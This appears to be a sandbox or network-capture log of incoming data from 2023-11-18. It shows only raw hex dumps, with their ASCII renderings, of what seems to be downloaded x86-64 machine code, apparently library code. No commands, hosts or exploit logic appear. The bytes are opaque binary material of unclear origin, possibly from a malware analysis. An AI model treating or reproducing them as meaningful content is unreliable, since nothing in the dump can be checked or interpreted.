2023-11-18 09:02:42 UTC	9539	IN	Data Raw: ff 44 8b 4c 24 78 44 8b 94 24 80 00 00 00 4c 8b 74 24 30 41 f6 45 30 80 48 8b ac 24 88 00 00 00 0f 85 1a 01 00 00 41 80 7f 1e 00 74 04 32 d2 eb 12 45 85 e4 41 0f b6 c4 ba 20 00 00 00 0f 45 d0 80 ca 01 0f b6 c2 0c 08 83 bc 24 a8 00 00 00 00 0f b6 c8 0f b6 c2 0f 44 c8 0f b6 d1 48 8b 8c 24 98 00 00 00 0f b6 c2 0c 10 0f b6 f8 85 f6 49 63 c1 0f 44 fa 44 8b 04 81 48 63 8b 98 00 00 00 39 8b 9c 00 00 00 7f 20 8b 84 24 90 00 00 00 45 8b c8 45 8b c2 89 44 24 20 ba 7e 00 00 00 48 8b cb e8 81 cd 04 00 eb 37 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 7e 00 00 00 44 89 54 c8 04 44 89 44 c8 08 48 8d 14 c8 8b 84 24 90 00 00 00 4c 89 5a 10 89 42 0c 41 80 7f 1e 00 75 37 48 8b 0b 80 79 63 00 74 0f 4d 8b c5 ba fa ff ff ff e8 cb b7 04 00 eb 1f 8b 83 Data Ascii: DL$xD$Lt$0AE0H$At2EA E$DH$IcDDHc9 $EED$ ~H7AHIH~DTDDH$LZBAu7HyctM
2023-11-18 09:02:42 UTC	9555	IN	Data Raw: 12 00 00 00 e9 ef ef ff ff 48 8b b5 a8 00 00 00 48 8b bd 98 00 00 00 e9 dc ef ff ff 48 8b b5 a8 00 00 00 48 8b d8 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 e9 bf ef ff ff 48 8b b5 a8 00 00 00 49 8b dc 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 e9 a2 ef ff ff 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 48 8b b5 a8 00 00 00 e9 88 ef ff ff 48 3b 9f 08 02 00 00 73 38 48 3b 9f f8 01 00 00 72 13 48 8b 87 f0 01 00 00 48 89 03 48 89 9f f0 01 00 00 eb 24 48 3b 9f 00 02 00 00 72 13 48 8b 87 e0 01 00 00 48 89 03 48 89 9f e0 01 00 00 eb 08 48 8b cb e8 fd 58 07 00 48 81 c4 48 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc 48 83 b9 98 00 00 00 00 0f 85 12 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 57 41 54 41 56 48 83 Data Ascii: HHHHLHHILHLHHH;s8H;rHHH$H;rHHHHXHHA_A^A]A\_^[]H@SWATAVH
2023-11-18 09:02:42 UTC	9571	IN	Data Raw: 8b cb e8 1f 4e 04 00 eb 2c 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 4e 00 00 00 89 54 c8 04 89 74 c8 08 89 7c c8 0c 48 89 7c c8 10 ff c6 49 83 c6 04 48 83 ed 01 0f 85 22 ff ff ff 48 8b 7c 24 40 48 8b 84 24 a0 00 00 00 49 3b 45 00 0f 85 7c 02 00 00 83 bc 24 c8 00 00 00 01 0f 85 6e 02 00 00 45 8d 6c 24 01 44 03 ab 98 00 00 00 45 85 e4 0f 8e f0 01 00 00 48 8b bc 24 b0 00 00 00 45 33 c9 48 8b 84 24 b8 00 00 00 4d 8b fc 44 8b a4 24 c0 00 00 00 45 8b f1 66 0f 1f 44 00 00 4c 8b 17 0f b7 00 41 f6 42 30 20 74 66 66 85 c0 78 61 0f bf c8 45 8b d9 45 0f b7 c1 85 c9 7e 2e 49 8b 52 08 48 83 c2 12 44 8b d9 44 8b c9 66 90 0f b7 0a 41 8d 40 01 66 83 e1 20 48 8d 52 18 66 41 0f 45 c0 44 0f b7 c0 49 83 e9 01 75 e2 49 63 c3 48 8d 0c 40 49 8b 42 08 Data Ascii: N,AHIHNTt\|H\|IH"H\|$@H$I;E\|$nEl$DEH$E3H$MD$EfDLAB0 tffxaEE~.IRHDDfA@f HRfAEDIuIcH@IB
2023-11-18 09:02:42 UTC	9585	IN	Data Raw: 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 79 10 eb 14 f6 c2 01 74 05 48 8b fb eb 0a b2 01 e8 0b 30 04 00 48 8b f8 48 8b 0e 0f b7 41 08 a8 24 74 05 48 8b 19 eb 21 a8 08 74 0b f2 0f 10 01 e8 2b 3e 04 00 eb 0f a8 12 74 0e 48 39 59 10 74 08 e8 da 3d 04 00 48 8b d8 4c 8b c7 48 8d 15 05 23 08 00 8b cb 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 17 af 06 00 cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 19 48 8b f1 48 8b 43 28 48 85 c0 74 08 8b b8 88 00 00 00 eb 05 bf 00 ca 9a 3b b8 00 24 00 00 66 85 43 08 75 06 83 7b 20 00 74 08 48 8b cb e8 0c 3e 04 00 48 c7 43 30 00 00 00 00 48 8d 05 2d a8 08 00 48 89 43 10 b8 02 0a 00 00 66 89 43 08 c7 43 0c 54 00 00 00 c6 43 0a 01 83 ff 54 7d 27 48 8b 43 28 48 85 c0 74 16 48 8b 80 60 01 00 00 48 Data Ascii: fA;uyuHytH0HHA$tH!t+>tH9Yt=HLH#H\$0Ht$8H _H\$Ht$WH HHHC(Ht;$fCu{ tH>HC0H-HCfCCTCT}'HC(HtH`H
2023-11-18 09:02:42 UTC	9601	IN	Data Raw: ff ff ff ff 8b 07 ff c8 48 98 48 6b c8 70 4c 89 6c 39 18 4c 89 6c 39 10 48 8b ce 49 8b 17 e8 0b 98 06 00 48 89 47 18 48 8b ce 48 8b 56 20 48 63 c3 48 c1 e0 05 48 8b 14 10 e8 f0 97 06 00 48 89 47 10 48 8b 84 24 d0 00 00 00 4c 8b cd 48 89 44 24 40 4c 8b c7 c7 44 24 38 00 00 02 00 33 d2 4c 89 64 24 30 49 8b ce 4c 89 6c 24 28 4c 89 6c 24 20 e8 08 7a fe ff 8b 94 24 d8 00 00 00 4c 8d 44 24 50 89 54 24 54 49 8b ce 48 8b d0 c6 44 24 50 0c 48 8b d8 4c 89 6c 24 58 4c 89 6c 24 68 44 89 6c 24 60 e8 76 91 fd ff 48 85 db 74 11 41 b8 01 00 00 00 48 8b d3 48 8b ce e8 f0 7b fe ff 4c 8d 9c 24 80 00 00 00 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 45 8b d0 4c 8b c9 e8 61 00 00 00 85 c0 Data Ascii: HHkpLl9Ll9HIHGHHV HcHHHGH$LHD$@LD$83Ld$0ILl$(Ll$ z$LD$PT$TIHD$PHLl$XLl$hDl$`vHtAHH{L$I[0Ik8Is@IA_A^A]A\_H(ELa
2023-11-18 09:02:42 UTC	9617	IN	Data Raw: 07 00 e8 17 1d 06 00 e9 9a 05 00 00 8b d3 e8 8b e5 ff ff 49 8b cc e8 b3 5e 00 00 e9 86 05 00 00 49 8b 45 10 41 b9 01 00 00 00 48 85 c0 74 0c 48 8b 40 28 41 ff c1 48 85 c0 75 f4 4d 8b c2 48 8d 15 41 d2 07 00 48 8b cd e8 51 32 06 00 48 89 44 24 50 4c 8b f8 48 85 c0 0f 84 48 05 00 00 41 38 b4 24 14 01 00 00 74 03 fe 40 07 41 80 bc 24 14 01 00 00 02 73 64 48 8b 1f 48 8d 05 c6 ae 07 00 83 7c 24 40 01 4c 8d 05 6a c9 07 00 49 8b cc 48 89 5c 24 20 4c 0f 45 c0 45 33 c9 41 8d 51 12 e8 fa 84 00 00 85 c0 0f 85 fa 04 00 00 83 7c 24 40 01 ba 03 00 00 00 4d 8b 4d 00 b8 01 00 00 00 0f 45 d0 48 89 5c 24 20 4d 8b c7 49 8b cc e8 cc 84 00 00 85 c0 0f 85 cc 04 00 00 4c 8b 8c 24 50 01 00 00 48 83 cb ff 4d 85 c9 0f 85 97 00 00 00 41 0f bf 45 36 ff c8 48 98 48 8d 0c 40 49 8b 45 Data Ascii: I^IEAHtH@(AHuMHAHQ2HD$PLHHA8$t@A$sdHH\|$@LjIH\$ LEE3AQ\|$@MMEH\$ MIL$PHMAE6HH@IE
2023-11-18 09:02:42 UTC	9633	IN	Data Raw: 00 00 e8 57 70 f1 ff 44 0f b7 46 60 48 03 db 48 8b 56 08 4d 03 c0 48 89 7e 10 48 8d 3c 6f 48 8b cf e8 38 70 f1 ff 44 0f b7 46 60 48 8b 56 38 48 89 7e 08 48 03 fb 48 8b cf e8 20 70 f1 ff 83 4e 64 10 33 c0 48 89 7e 38 66 89 6e 60 eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 7c 24 38 48 8b 6c 24 40 48 83 c4 20 5e c3 cc cc cc cc cc cc 48 89 54 24 10 53 57 41 54 41 56 41 57 48 83 ec 40 0f bf 7a 36 45 33 e4 4c 8b 4a 08 4c 8b f2 48 8b d9 45 8b d4 85 ff 7e 43 44 8b df 0f 1f 40 00 49 8b 11 41 8b c4 44 0f b6 02 45 84 c0 74 1c 90 41 80 f8 22 8d 48 01 44 0f b6 42 01 48 8d 52 01 0f 45 c8 8d 41 01 45 84 c0 75 e5 41 83 c2 07 49 83 c1 18 44 03 d0 49 83 eb 01 75 c4 49 8b 16 41 8b cc 44 0f b6 02 45 84 c0 74 20 0f 1f 44 00 00 41 80 f8 22 8d 41 01 44 0f b6 42 01 48 8d 52 01 0f Data Ascii: WpDF`HHVMH~H<oH8pDF`HV8H~HH pNd3H~8fn`H\$0H\|$8Hl$@H ^HT$SWATAVAWH@z6E3LJLHE~CD@IADEtA"HDBHREAEuAIDIuIADEt DA"ADBHR
2023-11-18 09:02:42 UTC	9649	IN	Data Raw: 86 70 01 00 00 49 8b 1c 06 48 8b 5b 50 48 85 db 74 0e 4c 39 2b 74 09 48 8b 5b 28 48 85 db 75 f2 48 63 97 98 00 00 00 39 97 9c 00 00 00 7f 1c 45 33 c9 44 89 64 24 20 45 33 c0 ba a8 00 00 00 48 8b cf e8 e7 14 03 00 8b d0 eb 26 48 8d 0c 52 8d 42 01 89 87 98 00 00 00 48 8b 87 90 00 00 00 48 c7 04 c8 a8 00 00 00 4c 89 64 c8 08 4c 89 64 c8 10 48 8b 07 44 38 60 63 75 48 85 d2 79 08 8b 97 98 00 00 00 ff ca 48 63 c2 48 8d 0c 40 48 8b 87 90 00 00 00 44 38 64 c8 01 48 8d 14 c8 74 13 41 b9 f4 ff ff ff 4c 8b c3 48 8b cf e8 fe fb 02 00 eb 10 48 85 db 74 0b 48 89 5a 10 c6 42 01 f4 ff 43 18 ff c5 49 83 c6 08 3b ae 18 01 00 00 0f 8c 2a ff ff ff 48 8b ce 44 89 a6 18 01 00 00 e8 cb 01 00 00 48 8b ce e8 b3 89 fe ff 4c 8b 66 58 33 db 4d 85 e4 74 7a 88 5e 23 44 8b fb 41 39 1c Data Ascii: pIH[PHtL9+tH[(HuHc9E3Dd$ E3H&HRBHHLdLdHD8`cuHyHcH@HD8dHtALHHtHZBCI;*HDHLfX3Mtz^#DA9
2023-11-18 09:02:42 UTC	9665	IN	Data Raw: 00 00 80 7c c8 01 00 48 8d 14 c8 74 18 4c 8b 84 24 88 00 00 00 41 b9 fa ff ff ff 48 8b cb e8 8b bc 02 00 eb 15 48 8b 84 24 88 00 00 00 48 85 c0 74 08 48 89 42 10 c6 42 01 fa 8b 83 98 00 00 00 85 c0 7e 1a ff c8 48 63 c8 48 8b 83 90 00 00 00 48 8d 14 49 b9 08 00 00 00 66 89 4c d0 02 41 f7 44 24 5c 00 08 00 00 0f 85 d7 03 00 00 41 83 bc 24 f8 02 00 00 00 0f 85 c8 03 00 00 8b 44 24 74 41 b8 01 00 00 00 4c 8b 94 24 10 01 00 00 41 8b d5 44 8b 74 24 58 44 8d 78 04 44 8d 60 03 44 89 7c 24 60 45 03 f7 44 89 a4 24 a8 00 00 00 45 39 72 38 8d 78 01 8d 70 02 41 8b ce 48 8b 84 24 18 01 00 00 45 8b ce 41 0f 4f 4a 38 8b 68 30 41 89 4a 38 49 8b ca 8b 83 98 00 00 00 89 44 24 48 e8 6a 05 00 00 45 8b c6 ba 32 00 00 00 48 8b cb e8 da d2 02 00 44 8b 4c 24 74 41 b8 02 00 00 00 Data Ascii: \|HtL$AHH$HtHBB~HcHHIfLAD$\A$D$tAL$ADt$XDxD`D\|$`ED$E9r8xpAH$EAOJ8h0AJ8ID$HjE2HDL$tA
2023-11-18 09:02:42 UTC	9681	IN	Data Raw: 00 41 5e 41 5d 41 5c 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 71 10 48 8b f9 48 8b 19 48 85 f6 74 21 8b 46 24 3d a3 0d f2 2d 74 07 3d 73 29 9c 31 75 08 48 8b ce e8 99 50 02 00 48 8b ce e8 01 4a 02 00 48 8b 97 40 01 00 00 48 85 d2 74 1d 48 85 db 74 0a 48 83 bb 18 03 00 00 00 75 06 83 42 2c ff 75 08 48 8b cb e8 88 66 ff ff 48 8b 8f 48 01 00 00 48 85 c9 74 22 48 8b 41 28 48 8b d1 48 8b cb 48 89 87 48 01 00 00 e8 76 72 ff ff 48 8b 8f 48 01 00 00 48 85 c9 75 de 48 8b 97 50 01 00 00 48 8b cb e8 fb 39 fc ff 48 8b 4f 08 48 85 c9 74 62 48 85 db 74 58 48 83 bb 18 03 00 00 00 74 0d 48 8b d1 48 8b cb e8 68 5f 05 00 eb 46 48 3b 8b 08 02 00 00 73 38 48 3b 8b f8 01 00 00 72 13 48 8b 83 f0 01 Data Ascii: A^A]A\_[]H\$Ht$WH HqHHHt!F$=-t=s)1uHPHJH@HtHtHuB,uHfHHHt"HA(HHHHvrHHHuHPH9HOHtbHtXHtHHh_FH;s8H;rH
2023-11-18 09:02:42 UTC	9687	IN	Data Raw: 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 81 90 01 00 00 48 85 c0 74 16 0f 1f 40 00 4c 39 00 74 0a 48 8b 40 18 48 85 c0 75 f2 c3 48 89 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 74 24 18 57 48 83 ec 20 80 b9 14 01 00 00 03 49 8b f0 48 8b da 48 8b f9 0f 84 95 00 00 00 48 8b 09 48 85 c9 74 0c ba 20 00 00 00 e8 49 43 05 00 eb 4e 83 3d a0 d6 09 00 00 74 3a 48 8b 0d 57 0c 0a 00 48 85 c9 74 06 ff 15 0c d7 09 00 48 8d 54 24 30 b9 20 00 00 00 e8 1d 4b 05 00 48 8b 0d 36 0c 0a 00 48 85 c9 74 06 ff 15 fb d6 09 00 4c 8b 44 24 30 eb 0e b9 20 00 00 00 ff 15 79 d6 09 00 4c 8b c0 4d 85 c0 74 2b 33 c0 49 89 40 08 49 89 40 10 49 89 40 18 49 89 18 0f 10 06 41 0f 11 40 08 48 8b 87 90 01 00 00 49 89 40 18 4c 89 87 90 01 00 00 48 8b 74 24 40 48 8b Data Ascii: 3HHt@L9tH@HuHH\$Ht$WH IHHHHt ICN=t:HWHtHT$0 KH6HtLD$0 yLMt+3I@I@I@IA@HI@LHt$@H
2023-11-18 09:02:42 UTC	9701	IN	Data Raw: 8b cf e8 77 fd ff ff 48 8b 0f 48 8b d5 c6 47 23 01 e8 b8 6f 00 00 8b 93 98 00 00 00 85 f6 79 03 8d 72 ff 48 8b 03 80 78 63 00 74 0f 48 8d 05 93 d5 09 00 89 50 08 e9 ac 00 00 00 48 63 c6 48 8d 0c 40 48 8b 83 90 00 00 00 89 54 c8 08 48 8d 04 c8 e9 91 00 00 00 33 d2 8b ea 48 85 f6 75 10 48 8b 0f 48 8b d5 e8 44 5f 00 00 48 8b f0 eb 41 48 63 06 8d 48 01 39 4e 04 7d 13 48 8b 0f 4c 8b c5 48 8b d6 e8 36 5e 00 00 48 8b f0 eb 23 0f 10 05 c2 29 07 00 48 c1 e0 05 0f 10 0d c7 29 07 00 89 0e 0f 11 44 30 08 0f 11 4c 30 18 48 89 6c 30 08 48 85 f6 74 2e 8b 06 ff c8 48 63 c8 41 8b c6 48 c1 e1 05 c1 e8 1c 83 e0 08 83 64 31 1c f7 09 44 31 1c 45 85 f6 79 07 ff 47 38 44 8b 77 38 44 89 74 31 20 48 89 77 58 41 8b c6 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 30 41 5f Data Ascii: wHHG#oyrHxctHPHcH@HTH3HuHHD_HAHcH9N}HLH6^H#)H)D0L0Hl0Ht.HcAHd1D1EyG8Dw8Dt1 HwXAH\$PHl$XHt$`H0A_
2023-11-18 09:02:42 UTC	9715	IN	Data Raw: 48 85 c0 0f 84 80 00 00 00 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 89 43 18 48 89 43 20 48 89 43 28 48 89 43 30 48 89 43 38 48 89 43 40 c6 03 9a 66 44 89 6b 32 45 85 e4 75 24 8b 84 24 b0 00 00 00 b9 00 00 00 20 85 c0 89 43 08 ba 00 00 00 10 0f 45 ca 81 c9 00 04 80 00 09 4b 04 eb 23 48 8d 4b 48 48 89 4b 08 85 f6 74 0f 44 8b c6 48 8d 15 31 2f 06 00 e8 84 27 f0 ff 48 8b 43 08 c6 04 06 00 c7 43 28 01 00 00 00 45 33 c9 4c 8b c3 ba 93 00 00 00 49 8b ce e8 b2 3f 00 00 48 89 45 60 4c 8d 44 24 30 c7 45 08 00 00 00 00 48 8b d5 49 8b ce e8 07 c9 fb ff 4c 8b 6c 24 60 4c 8b 64 24 68 48 8b 74 24 70 85 c0 74 14 41 83 7e 30 00 74 09 0f b6 07 88 47 02 c6 07 b5 33 c0 eb 78 8b 94 24 a0 00 00 00 8b 5c 24 34 89 5f 2c 85 d2 74 08 49 8b cf e8 26 fa 01 00 44 8b 47 44 ba 42 00 Data Ascii: H3HHCHCHCHC HC(HC0HC8HC@fDk2Eu$$ CEK#HKHHKtDH1/'HCC(E3LI?HE`LD$0EHILl$`Ld$hHt$ptA~0tG3x$\$4_,tI&DGDB
2023-11-18 09:02:42 UTC	9730	IN	Data Raw: eb 53 83 3d bd 27 09 00 00 74 35 48 8b 0d 74 5d 09 00 48 85 c9 74 06 ff 15 29 28 09 00 48 8d 54 24 38 b9 78 00 00 00 e8 3a 9c 04 00 48 8b 0d 53 5d 09 00 48 85 c9 74 18 ff 15 18 28 09 00 eb 10 b9 78 00 00 00 ff 15 9b 27 09 00 48 89 44 24 38 48 8b 7c 24 38 48 85 ff 74 0e 33 d2 48 8b cf 44 8d 42 78 e8 9e f1 ef ff 48 89 7b 28 33 ff 48 89 7b 30 48 89 7b 38 48 89 7b 40 48 89 7b 48 48 89 7b 50 48 89 7b 58 48 89 7b 60 48 89 7b 68 48 89 7b 70 48 89 7b 78 49 8b 0e 40 38 79 63 74 19 48 8d 44 24 50 44 8b c7 48 3b d8 48 8b d3 41 0f 95 c0 e8 60 75 fc ff 8b f7 49 89 7f 20 48 85 f6 74 0f 48 85 ed 74 07 c6 06 86 48 89 6e 50 48 8b ee 48 8b 5c 24 40 41 ff c5 8b 54 24 30 49 83 c4 20 44 3b 2b 0f 8c 30 fe ff ff eb 29 41 83 f8 01 89 54 24 20 48 8d 05 74 ee 05 00 49 8b ce 4c 8d Data Ascii: S='t5Ht]Ht)(HT$8x:HS]Ht(x'HD$8H\|$8Ht3HDBxH{(3H{0H{8H{@H{HH{PH{XH{`H{hH{pH{xI@8yctHD$PDH;HA`uI HtHtHnPHH\$@AT$0I D;+0)AT$ HtIL
2023-11-18 09:02:42 UTC	9746	IN	Data Raw: 8b 84 24 d0 00 00 00 80 b8 14 01 00 00 02 72 28 4d 85 d2 74 23 48 8b 80 90 01 00 00 48 85 c0 74 17 49 8d 4d 40 90 48 39 08 0f 84 58 01 00 00 48 8b 40 18 48 85 c0 75 ee 33 ff 4c 8b 94 24 e8 00 00 00 49 8b ca e8 7c 13 04 00 45 0f bf 7b 36 44 0f b6 e8 49 8b 73 08 8b ef 45 85 ff 0f 8e af 00 00 00 4c 63 64 24 40 44 38 6e 0e 0f 85 87 00 00 00 48 8b 16 4d 8b ca 4c 2b ca 0f b6 02 45 0f b6 04 11 41 3b c0 0f 85 06 01 00 00 85 c0 0f 85 17 01 00 00 49 83 fc 01 0f 85 54 01 00 00 41 f6 46 3c 04 75 54 49 8b 46 50 48 85 c0 0f 84 40 01 00 00 33 c9 8b d9 48 63 48 08 85 c9 0f 8e 30 01 00 00 4c 8b 18 48 8b f9 4d 8b 03 4d 2b d0 66 0f 1f 84 00 00 00 00 00 41 0f b6 00 47 0f b6 0c 02 41 3b c1 0f 85 ca 00 00 00 85 c0 0f 85 e0 00 00 00 4c 8b 94 24 e8 00 00 00 ff c5 48 83 c6 18 41 Data Ascii: $r(Mt#HHtIM@H9XH@Hu3L$I\|E{6DIsELcd$@D8nHML+EA;ITAF<uTIFPH@3HcH0LHMM+fAGA;L$HA
2023-11-18 09:02:42 UTC	9762	IN	Data Raw: 00 48 8b 05 ce 88 08 00 48 33 c4 48 89 84 24 20 02 00 00 48 83 79 18 00 4c 8b e2 4c 8b f9 75 2e 48 8b 49 10 48 8b 49 28 e8 a9 fe 00 00 49 89 47 18 48 85 c0 74 4a 49 8b 4f 10 48 8b 51 28 0f b7 4a 06 66 89 48 10 49 8b 47 18 c6 40 13 00 49 8b 47 10 48 89 9c 24 70 02 00 00 49 8b 1c 24 48 89 b4 24 40 02 00 00 0f b6 48 5c 48 89 bc 24 38 02 00 00 80 f9 01 75 13 48 8d 05 28 11 00 00 eb 1f b8 07 00 00 00 e9 28 01 00 00 80 f9 02 48 8d 05 52 14 00 00 48 8d 15 7b 12 00 00 48 0f 44 c2 33 d2 49 89 47 40 41 b8 00 02 00 00 48 8d 4c 24 20 e8 51 71 ef ff 33 ff 48 85 db 0f 84 99 00 00 00 48 89 ac 24 78 02 00 00 4c 89 b4 24 30 02 00 00 66 0f 1f 44 00 00 49 8b 44 24 08 48 85 c0 74 13 48 3b d8 75 05 48 8b ef eb 0d 48 63 6b 08 48 03 e8 eb 04 48 8b 6b 08 48 8b f7 48 89 7b 08 48 Data Ascii: HH3H$ HyLLu.HIHI(IGHtJIOHQ(JfHIG@IGH$pI$H$@H\H$8uH((HRH{HD3IG@AHL$ Qq3HH$xL$0fDID$HtH;uHHckHHkHH{H
2023-11-18 09:02:42 UTC	9778	IN	Data Raw: 0f b6 74 24 40 44 8d 42 fd 0f 84 8a 51 00 00 48 8b 7c 24 48 f7 d9 44 8b 64 24 44 45 33 db 4c 8b 74 24 68 48 83 c7 18 4c 8b 4c 24 50 41 ba 00 24 00 00 48 8b 5c 24 60 89 4d 80 e9 b1 eb ff ff 8b 45 80 85 c0 48 8b 44 24 48 79 1d 8b 40 04 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 88 eb ff ff 75 1d 8b 40 08 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 69 eb ff ff 8b 40 0c 48 8b 5c 24 60 ff c8 48 98 48 8d 0c 40 49 8d 3c c9 48 83 c7 18 e9 4c eb ff ff 48 8b 44 24 48 ba 02 00 00 00 48 63 40 04 48 6b c8 38 49 03 cd e8 c8 35 01 00 8b d8 ba 02 00 00 00 48 8b 44 24 48 48 63 48 08 48 6b c9 38 49 03 cd e8 ac 35 01 00 48 8b 4c 24 48 8d 04 58 03 c3 80 39 2c 48 8d 0d e8 07 ef ff 48 98 75 0a 0f b6 8c 08 08 cf 16 00 eb 08 0f b6 8c Data Ascii: t$@DBQH\|$HDd$DE3Lt$hHLL$PA$H\$`MEHD$Hy@H\$`HH@I<Hu@H\$`HH@I<Hi@H\$`HH@I<HLHD$HHc@Hk8I5HD$HHcHHk8I5HL$HX9,HHu
2023-11-18 09:02:42 UTC	9794	IN	Data Raw: 85 c0 74 0e 66 90 48 8b c8 48 8b 40 08 48 85 c0 75 f4 48 8b 44 24 48 48 63 40 04 48 6b f8 38 48 03 79 20 eb 10 48 8b 44 24 48 48 63 40 04 48 6b f8 38 49 03 fd 48 8b cf e8 99 f5 00 00 48 8b 4c 24 48 48 63 41 08 48 6b d8 38 49 03 dd 48 8b cb e8 81 f5 00 00 48 8b 03 45 33 db 41 8d 53 04 45 8d 43 01 48 39 07 0f 8d f9 10 00 00 4c 8b 4c 24 50 41 ba 00 24 00 00 48 8b 5c 24 60 48 89 07 48 8b 7c 24 48 48 83 c7 18 e9 63 ab ff ff 48 8b 44 24 48 48 8b 7c 24 48 48 63 40 04 48 6b c8 38 4a 8b 14 29 48 85 d2 0f 8e 36 c7 ff ff 48 8b c7 48 63 40 0c 48 2b d0 4a 89 14 29 e9 b2 c4 ff ff 48 8b 4c 24 48 48 8b d1 48 63 41 04 48 6b d8 38 48 63 41 0c 49 8b ce 48 6b f8 38 e8 b7 1f 00 00 4a 8b 0c 2b 45 33 db 48 89 4d 30 4c 8b d0 48 85 c9 7e 31 4a 8b 0c 2f 41 8b d3 48 85 c9 48 0f 4f Data Ascii: tfHH@HuHD$HHc@Hk8Hy HD$HHc@Hk8IHHL$HHcAHk8IHHE3ASECH9LL$PA$H\$`HH\|$HHcHD$HH\|$HHc@Hk8J)H6HHc@H+J)HL$HHHcAHk8HcAIHk8J+E3HM0LH~1J/AHHO
2023-11-18 09:02:42 UTC	9810	IN	Data Raw: 52 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 45 33 c9 45 8d 41 01 e9 34 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 45 33 c9 45 33 c0 e9 15 00 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 6c 24 18 48 89 74 24 20 41 56 48 83 ec 30 41 8b e8 8b f2 4c 8b f1 48 85 c9 75 3c 48 8d 05 00 22 05 00 41 b9 4c 4f 01 00 4c 8d 05 8b f9 04 00 48 89 44 24 20 48 8d 15 4b f9 04 00 41 8d 4e 15 e8 5a 28 03 00 33 c0 48 8b 6c 24 50 48 8b 74 24 58 48 83 c4 30 41 5e c3 0f b7 81 c8 00 00 00 48 89 5c 24 40 48 8b 19 48 89 7c 24 48 33 ff 3b f0 7d 59 85 f6 78 55 48 8b 4b 18 41 0f af c1 03 f0 48 85 c9 74 06 ff 15 64 e7 07 00 48 63 c6 48 6b c8 38 49 03 8e a0 00 00 00 85 ed 74 07 e8 9d 19 00 00 eb 05 e8 d6 19 00 Data Ascii: RE3EA4E3E3Hl$Ht$ AVH0ALHu<H"ALOLHD$ HKANZ(3Hl$PHt$XH0A^H\$@HH\|$H3;}YxUHKAHtdHcHk8It
2023-11-18 09:02:42 UTC	9826	IN	Data Raw: 42 03 48 c1 e2 08 48 0b d1 48 0b d0 b8 04 00 00 00 66 41 89 40 08 49 89 10 c3 0f b6 41 03 0f b6 51 02 48 c1 e2 08 48 0b d0 0f b6 41 04 48 c1 e2 08 48 0b d0 0f b6 41 05 48 c1 e2 08 48 0b d0 0f be 01 c1 e0 08 48 63 c8 41 0f b6 42 01 48 0b c8 b8 04 00 00 00 48 c1 e1 20 48 03 d1 66 41 89 40 08 49 89 10 b8 06 00 00 00 c3 e9 77 00 00 00 b8 04 00 00 00 8d 4a f8 66 41 89 40 08 33 c0 49 89 08 c3 8b ca 4d 89 50 10 8d 42 f4 d1 e8 83 e1 01 41 89 40 0c 41 0f b7 8c 4b 34 24 17 00 66 41 89 48 08 c3 0f 1f 00 97 b6 11 00 a4 b6 11 00 bb b6 11 00 df b6 11 00 0f b7 11 00 44 b7 11 00 94 b7 11 00 94 b7 11 00 99 b7 11 00 99 b7 11 00 83 b6 11 00 97 b6 11 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 41 01 4c 8b c9 44 0f b6 11 49 c1 e2 08 4c 0b d0 0f b6 41 02 49 c1 e2 Data Ascii: BHHHfA@IAQHHAHHAHHHcABHH HfA@IwJfA@3IMPBA@AK4$fAHDALDILAI
2023-11-18 09:02:42 UTC	9842	IN	Data Raw: 8b c1 0f ba e8 07 48 8b f2 4c 8b 4f 50 89 81 d0 00 00 00 8b 81 98 00 00 00 ff c8 48 98 48 8d 0c 40 49 8b 80 90 00 00 00 48 8d 14 c8 0f b6 02 3c 3f 77 6d 0f b6 c8 83 f9 0a 77 53 8b c1 41 8b 8c 8a 68 f8 11 00 49 03 ca ff e1 83 7a 08 00 74 0b 41 81 a0 d0 00 00 00 7f ff ff ff 41 81 88 d0 00 00 00 00 01 00 00 eb 38 4c 89 5a 10 c6 42 01 fb eb 2e 48 89 6a 10 c6 42 01 fb eb 24 8b 42 08 3b c3 7e 1d 8b d8 eb 19 39 5a ec 0f 4f 5a ec 8b 42 08 85 c0 79 0b f7 d0 48 98 41 8b 0c 81 89 4a 08 49 3b 90 90 00 00 00 74 09 48 83 ea 18 e9 7a ff ff ff 48 8b 57 50 49 8b 08 48 85 d2 74 5f 48 85 c9 74 52 48 83 b9 18 03 00 00 00 74 07 e8 e4 d8 02 00 eb 49 48 3b 91 08 02 00 00 73 38 48 3b 91 f8 01 00 00 72 13 48 8b 81 f0 01 00 00 48 89 02 48 89 91 f0 01 00 00 eb 24 48 3b 91 00 02 00 Data Ascii: HLOPHH@IH<?wmwSAhIztAA8LZB.HjB$B;~9ZOZByHAJI;tHzHWPIHt_HtRHtIH;s8H;rHHH$H;
